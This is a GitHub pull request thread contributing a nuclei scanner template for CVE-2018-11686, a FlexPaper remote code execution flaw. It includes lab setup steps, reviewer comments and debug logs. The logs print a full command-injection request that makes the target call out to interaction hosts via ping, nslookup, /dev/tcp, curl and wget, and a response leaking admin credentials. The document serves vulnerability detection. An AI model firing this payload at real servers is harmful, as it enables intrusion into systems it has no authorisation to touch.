Add CVE-2018-11686

[pszyszkowski]

Template / PR Information

• Added CVE-2018-11686
• References:
  • https://github.com/mpgn/CVE-2018-11686

Template for #12369
To create vulnerable instance create Dockerfile with following content:

FROM php:5.6-apache-stretch
COPY --chown=www-data:www-data ./flexpaper/ /var/www/html/

Get flexpaper:

git clone https://github.com/dw250100785/FlexPaper_2.1.2.git flexpaper

Build and run:

docker build -t flexpaper .
docker run --rm -p 8888:80 flexpaper

Run nuclei

nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Debug:

nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2018-11686] Dumped HTTP request for http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b

GET /php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2018-11686] Dumped HTTP response http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Tue, 17 Jun 2025 04:26:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.25 (Debian)
Set-Cookie: PHPSESSID=d17c925b4718d50b022b52ed5fb7a29e; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40


    <!--



    {
    "allowcache":true,
    "splitmode":"false",
    "path.pdf":"G:\\wamp\\www\\FlexPaper\\pdf\\",
    "path.swf":"G:\\wamp\\www\\FlexPaper\\docs\\",
    "renderingorder.primary":null,
    "renderingorder.secondary":null,
    "cmd.conversion.singledoc":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",
    "cmd.conversion.splitpages":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}_%.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",
    "cmd.conversion.renderpage":"swfrender \"{path.swf}{swffile}\" -p {page} -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",
    "cmd.conversion.rendersplitpage":"swfrender \"{path.swf}{swffile}\" -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",
    "cmd.conversion.jsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress \"{path.swf}{pdffile}.js\"",
    "cmd.conversion.splitjsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress -split 10 \"{path.swf}{pdffile}_%.js\"",
    "cmd.searching.extracttext":"swfstrings \"{swffile}\"",
    "cmd.query.swfwidth":"swfdump {swffile} -X",
    "cmd.query.swfheight":"swfdump \"{swffile}\" -Y",
    "pdf2swf":false,
    "admin.username":"admin",
    "admin.password":"123456",
    "licensekey":"gpl"
    }
    -->


    <br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/html/php/lib/config.php:31) in <b>/var/www/html/php/setup.php</b> on line <b>140</b><br />
[d18esui1sadpsj315g70qj597ihyxpmdf] Received DNS interaction from 172.69.49.15 at 2025-06-17 04:26:46
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 62173
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1452

;; QUESTION SECTION:
;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.   IN       AAAA



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 62173
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.   IN       AAAA

;; ANSWER SECTION:
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      A       178.128.210.172

;; AUTHORITY SECTION:
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      NS      ns1.oast.live.
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live.    3600    IN      NS      ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.  3600    IN      A       178.128.210.172
ns2.oast.live.  3600    IN      A       178.128.210.172


[CVE-2018-11686:word-1] [http] [critical] http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b
[INF] Scan completed in 18.145644091s. 1 matches found.

/claim #12369

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[princechaddha]

Automated PR Review (Experimental)

---

Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes:

• Fix the spelling of intrusive in the tags list. It is currently spelled instrusive.
• Ensure the reference section includes links that directly demonstrate exploitation for better alignment with the purpose of this RCE template.

Other Suggestions:

• It would be beneficial to add a matcher that checks for an expected HTTP status code (such as 200 OK) or a specific response header to improve the reliability of the results and reduce false positives.
• Consider adding a second matcher based on the response body (e.g., looking for indications that the arbitrary code was executed) to further validate the success of the exploitation.
• Verify that your callback command in the variables section is compatible with various shell environments, or mention that it might only work in specific contexts.

Please note that I am an AI Template bot, which is still experimental, and the team will review the PR shortly.

[DhiyaneshGeek]

Hi @pszyszkowski,

Thank you for sharing the template and contributing to the Template Project. We appreciate your participation in the Bounty Claim Program!

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again!

[DhiyaneshGeek]

Validated Locally

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

		projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2018-11686] FlexPaper - Remote Code Execution (@mpgn,@pszyszkowski) [critical]
[INF] Using Interactsh Server: oast.me
[CVE-2018-11686] [http] [critical] http://0.0.0.0:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d1cqg9dl6um7ujiti1qgfc9gh4tgscahs.oast.me%20%7c%7c%20nslookup%20d1cqg9dl6um7ujiti1qgac9k7h4y8yjdi.oast.me%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd1cqg9dl6um7ujiti1qghc8cjdn3d1nqg.oast.me%2f80%20%7c%7c%20curl%20http%3a%2f%2fd1cqg9dl6um7ujiti1qghg9wfn9w89yrm.oast.me%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd1cqg9dl6um7ujiti1qgocqdcy9jt7jhm.oast.me%20-O%20%2fdev%2fnull%3b

[DhiyaneshGeek]

Hi @pszyszkowski

As a token of appreciation for your valuable contribution, you can grab some cool PD Stickers from here http://nux.gg/stickers.